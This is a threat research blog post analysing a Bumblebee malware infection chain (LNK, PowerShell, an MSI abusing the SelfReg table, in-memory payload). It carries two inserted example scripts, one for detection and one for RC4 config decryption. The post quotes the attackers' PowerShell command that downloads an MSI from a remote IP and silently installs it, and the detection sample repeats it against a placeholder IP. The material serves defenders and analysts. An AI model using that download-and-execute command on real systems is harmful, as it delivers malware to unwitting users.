New Bumblebee Loader Infection Chain Signals Possible Resurgence

www.netskope.com · Leandro Froes · 1 year ago · research
Oct 18 2024 · By Leandro Fróes

Summary

Bumblebee is a highly sophisticated downloader malware that cybercriminals use to gain access to corporate networks and deliver other payloads, such as Cobalt Strike beacons and ransomware. The Google Threat Analysis Group first discovered the malware in March 2022 and named it Bumblebee based on a User-Agent string it used.

The Netskope Threat Labs team discovered what seems to be a new infection chain leading to Bumblebee malware infection, and our findings corroborate those shared by other researchers. In this blog post, we will analyze all the files involved in the chain until the execution of the Bumblebee payload.
Key findings

- This is the first occurrence of a Bumblebee campaign we have seen since Operation Endgame, an operation performed by Europol in May 2024 to disrupt major malware botnets such as Bumblebee, IcedID, and Pikabot.
- The infection chain used to deliver the final payload is not new, but this is the first time we have seen it being used by Bumblebee.
- These activities might indicate the resurfacing of Bumblebee in the threat landscape.

Initial infection

The infection likely starts via a phishing email luring the victim to download a ZIP file and extract and execute the file inside it. The ZIP file contains an LNK file named “Report-41952.lnk” that, once executed, starts a chain of events to download and execute the final Bumblebee payload in memory, avoiding the need to write the DLL to disk that was observed in previous campaigns.

LNK and PowerShell again?

The usage of LNK files is very common in Bumblebee campaigns, either to download the next stage payloads or to directly execute files. In this case, the file is used as a downloader and is responsible for downloading and executing the next stage of the infection chain.

Once opened, the LNK file executes a PowerShell command to download an MSI file from a remote server, save it as “%AppData%\y.msi”, and then execute/install it using the Microsoft msiexec.exe tool:

    %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe Invoke-WebRequest "https:///193.242.145.138/mid/w1/Midjourney.msi" -OutFile "%appdata%\y.msi";msiexec /i %appdata%\y.msi /qn

The “/qn” option ensures that no user interaction is needed in this step, making the execution of the LNK file the last step in the whole chain that requires user interaction.

New MSI approach

Using MSI files to execute payloads is a very successful technique that several adversaries use. Some well-known malware families, such as DarkGate and Latrodectus, are examples of how effective this method can be in both luring users and bypassing defenses.
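As an added example (not code from the post or from Netskope), the detection logic below runs over a few constructed Sysmon-style process-creation events and flags the LNK-launched PowerShell command described above (download from a bare-IP URL, an MSI written under %AppData%, and a silent msiexec install in one command line), plus the msiexec-spawns-LOLBin pattern that the CustomAction approach produces. The event fields, rule names and the TEST-NET-1 address are assumptions.

```python
import re

# Constructed Sysmon-style process-creation events (parent image, image, command line).
# Not real telemetry; 192.0.2.10 is a documentation (TEST-NET-1) address. Event 0 mirrors
# the LNK command quoted in the post, event 1 is the older msiexec -> rundll32 pattern,
# events 2 and 3 are benign activity.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell.exe Invoke-WebRequest "https://192.0.2.10/mid/w1/Midjourney.msi" '
            '-OutFile "%appdata%\\y.msi";msiexec /i %appdata%\\y.msi /qn'},
    {"parent": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\Users\Public\setup.dll,Entry"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe Get-ChildItem C:\Users\alice\Documents"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": "msiexec.exe /V"},
]

# Signals of the LNK stage: a download cmdlet fetching from a bare IPv4 URL,
# an .msi written under %AppData%, and a silent msiexec install (/qn, /qb, ...).
DOWNLOAD_CMDLET = re.compile(r"\b(?:invoke-webrequest|iwr|curl|wget)\b", re.I)
IPV4_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}/", re.I)
APPDATA_MSI = re.compile(r'%appdata%\\[^\s";]+\.msi', re.I)
QUIET_INSTALL = re.compile(r"\bmsiexec\b.*?\s/i\b.*?\s/q[nbrf]?\b", re.I)
# Children of msiexec.exe that the CustomAction approach typically needs.
MSI_CHILD_LOLBINS = {"rundll32.exe", "regsvr32.exe", "powershell.exe", "cmd.exe", "wscript.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def inspect_event(ev: dict) -> list:
    """Return (rule, reason) findings for one process-creation event."""
    findings = []
    image, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmd"]
    if image == "powershell.exe":
        signals = []
        if DOWNLOAD_CMDLET.search(cmd) and IPV4_URL.search(cmd):
            signals.append("download from bare IPv4 URL")
        if APPDATA_MSI.search(cmd):
            signals.append("MSI written under %AppData%")
        if QUIET_INSTALL.search(cmd):
            signals.append("silent msiexec install in the same command line")
        if len(signals) >= 2:  # two independent signals keep single-cmdlet noise out
            findings.append(("powershell_msi_dropper", "; ".join(signals)))
    if parent == "msiexec.exe" and image in MSI_CHILD_LOLBINS:
        findings.append(("msiexec_spawns_lolbin", f"msiexec.exe -> {image}"))
    return findings


def scan(events: list) -> list:
    """Run every rule over a list of events; returns (event index, rule, reason)."""
    return [(i, rule, why) for i, ev in enumerate(events) for rule, why in inspect_event(ev)]
```

The SelfReg variant analyzed in this post loads the DLL inside msiexec.exe itself, so the second rule will not fire on it; the first rule, on the delivery stage, is the one that still covers it.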
Similar to the mentioned cases, the new Bumblebee payload is delivered via MSI files. The analyzed samples are disguised as Nvidia and Midjourney installers. They are used to load and execute the final payload entirely in memory, without even having to drop the payload to disk, as previous campaigns using ISO files did.

Regarding MSI files, most malware, including earlier versions of Bumblebee, uses the CustomAction table to specify which steps to execute during the MSI installation. LOLBins such as rundll32.exe and regsvr32.exe are commonly used to load malicious DLLs via MSI files, as is powershell.exe to execute PowerShell scripts, as observed in previous Bumblebee campaigns. From an attacker's perspective, the downside of these approaches is that once any of those tools executes, a new process is created, giving defenders the opportunity to flag unusual events, such as a rundll32 process being created by msiexec.

In the analyzed version, Bumblebee uses a stealthier approach that avoids creating other processes and avoids writing the final payload to disk. It does so by using the SelfReg table to force the execution of the DllRegisterServer export function of a file listed in the File table. The entry in the SelfReg table works as a key indicating which file in the File table to execute, and in our case that file was the final payload DLL.

The mentioned DLL is present in a CAB file named “disk1”. Once the MSI installation starts, the DLL is loaded into the msiexec process address space and its DllRegisterServer export function is called, leading to the unpacking and execution of the Bumblebee payload. The following image shows an example of the final payload mapped in the memory of the msiexec process.

[Image: the unpacked Bumblebee payload mapped in the memory of the msiexec process]

Bumblebee payload

By analyzing the unpacked payload, we can flag some well-known characteristics of Bumblebee, such as its internal DLL name and exported functions. The configuration extraction approach is the same as in the other versions.
The malware uses a clear-text hardcoded key as the RC4 key to decrypt the encrypted configuration. In the analyzed samples, the key used was the string “NEW_BLACK”. The decrypted port was 443 and the campaign IDs were “msi” and “lnk001”.

The full analysis of the Bumblebee payload is out of the scope of this blog post. The Netskope Threat Labs team will monitor Bumblebee activities and follow up on the analysis when we have more information.

Netskope Detection

Netskope Advanced Threat Protection provides proactive coverage against this threat:

- Win32.Trojan.BumblebeeLNK
- Win64.Trojan.BumbleBee

IOCs

All the IOCs and scripts related to this malware can be found in our GitHub repository.
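As an added example (not the post's or Netskope's code), the script below implements the RC4 decryption of the configuration with the clear-text “NEW_BLACK” key described in the Bumblebee payload section, and validates the result so that a wrong key or a changed layout is reported instead of returning garbage. The field layout (NUL-terminated port and campaign ID strings) and the encrypted sample blobs are constructed stand-ins, not the real Bumblebee configuration format.

```python
from typing import Dict

# Clear-text RC4 key observed in the analysed samples (from the post).
RC4_KEY = b"NEW_BLACK"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def extract_config(encrypted: bytes, key: bytes = RC4_KEY) -> Dict[str, object]:
    """Decrypt a configuration blob and split it into fields.

    The field layout is a constructed stand-in (the post does not document the
    real one): NUL-terminated ASCII strings, port first, then the campaign ID,
    followed by NUL padding. A wrong key or a changed layout raises ValueError
    instead of silently returning garbage.
    """
    plain = rc4(key, encrypted)
    if not all(b == 0 or 0x20 <= b < 0x7F for b in plain):
        raise ValueError("decrypted data is not printable ASCII: wrong key or new layout")
    fields = [f.decode("ascii") for f in plain.split(b"\x00") if f]
    if len(fields) < 2 or not fields[0].isdigit():
        raise ValueError("unexpected field layout after decryption")
    return {"port": int(fields[0]), "campaign_id": fields[1]}


def make_sample_blob(port: int, campaign: str, size: int = 32) -> bytes:
    """Build a constructed encrypted blob in the stand-in layout (test input only)."""
    plain = f"{port}\x00{campaign}\x00".encode("ascii")
    return rc4(RC4_KEY, plain.ljust(size, b"\x00"))


# Constructed samples carrying the values reported in the post (port 443,
# campaign IDs "msi" and "lnk001"); they are not bytes from a real sample.
SAMPLE_MSI_BLOB = make_sample_blob(443, "msi")
SAMPLE_LNK_BLOB = make_sample_blob(443, "lnk001")
```

When a new sample uses a different key, the printable-ASCII check is what tells you the hardcoded string has changed rather than the layout.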